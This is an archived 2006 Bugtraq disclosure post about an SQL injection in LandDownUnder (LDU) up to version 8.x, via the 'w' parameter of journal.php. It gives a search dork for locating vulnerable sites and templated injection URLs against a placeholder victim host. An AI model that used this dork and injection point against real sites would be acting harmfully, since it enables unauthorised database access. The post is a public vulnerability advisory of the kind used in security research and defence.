Home page logo
/

bugtraq logo Bugtraq mailing list archives

LDU <= 8.x (journal.php) SQL Injection Vulnerability
From: starext () msn com
Date: 29 Dec 2006 16:26:21 -0000

# BhhGroup.Org & Trtekforum.com

#Found By  : St () rExT

# script name : LandDownUnder [LDU]

#Version : All

#Dork : "Powered by LDU"

# Script sites : http://www.neocrome.net

#Vull name  : LDU <= 8.x (journal.php) SQL Injection Vulnerability

# Vulnerable file : Journal.inc.php

http://victim.com/[scriptpath]/journal.php?m='&s=username&w=SELECT * FROM $db_journals WHERE jrn_userid='$jrn_userid' 
AND jrn_minlevel<='".$usr['level']."' ORDER BY jrn_$s $w

#[SQL Vuln.] :

http://victim.com/[scriptpath]/journal.php?m='&s=username&w=[SQL Inject]

#Contact: StareXt () msn com

                  ######## - Tüm Müslüman insanlar&#305;n Bayram&#305;n&#305; Kutlar&#305;m.. : ) - #####

################### -  Ne Mutlu Türküm Diyene - ###################


  By Date           By Thread  

Current thread:
  • LDU <= 8.x (journal.php) SQL Injection Vulnerability starext (Dec 29)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]